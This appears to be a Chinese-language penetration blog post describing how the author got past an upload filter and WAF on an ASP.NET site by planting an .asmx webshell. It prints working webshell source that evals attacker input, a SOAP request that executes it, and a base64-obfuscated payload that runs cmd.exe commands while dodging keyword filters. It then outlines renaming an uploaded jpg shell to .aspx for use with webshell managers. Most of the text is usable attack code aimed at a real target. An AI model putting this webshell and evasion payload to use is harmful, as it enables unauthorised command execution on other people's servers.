测试

在上传webshell的时候遇见asp.net的站，传aspx被拦截，测试发现能够解析asmx，搜了下发现这篇文章https://www.cnblogs.com/Ivan1ee/p/10278625.html

执行命令

直接拉到重点看到服务端实现的代码。

<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>
import System;
import System.Web;
import System.IO;
import System.Web.Services;
public class asmxWebMethodSpy extends WebService
{      
    WebMethodAttribute function Invoke(Ivan: String) : Void
    {
           var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
            Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        eval(Ivan);
    }
}

直接上传后访问如下

image.png

按照文章中的操作post数据包，页面返回时间，说明执行命令成功。但是执行敏感操作是被waf拦截，应该是存在关键字。

POST /UploadFiles/Content/file/xxx HTTP/1.1
Host: xxx.xxx.xxx
Content-Type: text/xml; charset=utf-8
Content-Length: 1771
SOAPAction: "http://tempuri.org/Invoke"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <Invoke xmlns="http://tempuri.org/">
      <Ivan>Response.Write(DateTime.Now);</Ivan>
    </Invoke>
  </soap:Body>
</soap:Envelope>

参考其他流量加密的shell管理工具的数据包，修改执行命令的数据包如下。

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <Invoke xmlns="http://tempuri.org/">
      <Ivan>Response.Write("e600c");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String("dmFyIGNtZD0iZDJodllXMXAiO3ZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbyhTeXN0ZW0uVGV4dC5FbmNvZGluZy5HZXRFbmNvZGluZygiVVRGLTgiKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZygiWTIxayIpKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKCJVVEYtOCIpLkdldFN0cmluZyhTeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKGNtZCkpO2lmKGZhbHNlKSB7dmFyIGVudnN0ciA9IFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKCJVVEYtOCIpLkdldFN0cmluZyhTeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKFJlcXVlc3QuSXRlbVsiZWJmNDIyNjY3NTZlNDgiXSkpO3ZhciBlbnZhcnIgPSBlbnZzdHIuc3BsaXQoInx8fGFzbGluZXx8fCIpO3ZhciBpO2ZvciAodmFyIGkgaW4gZW52YXJyKSB7dmFyIHNzID0gZW52YXJyW2ldLnNwbGl0KCJ8fHxhc2tleXx8fCIpO2lmIChzcy5sZW5ndGggIT0gMikge2NvbnRpbnVlO31jLkVudmlyb25tZW50VmFyaWFibGVzLkFkZChzc1swXSxzc1sxXSk7fX1lLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("89f96f3");Response.End()</Ivan>
    </Invoke>
  </soap:Body>
</soap:Envelope>

上面数据包执行的命令是whoami，后面就简单了，上传一个jpg的shell，使用mv命令改为后缀aspx，上那个冰蝎连接。（出来了一个好像更牛逼的叫哥斯拉在github上搜Godzilla）

image.png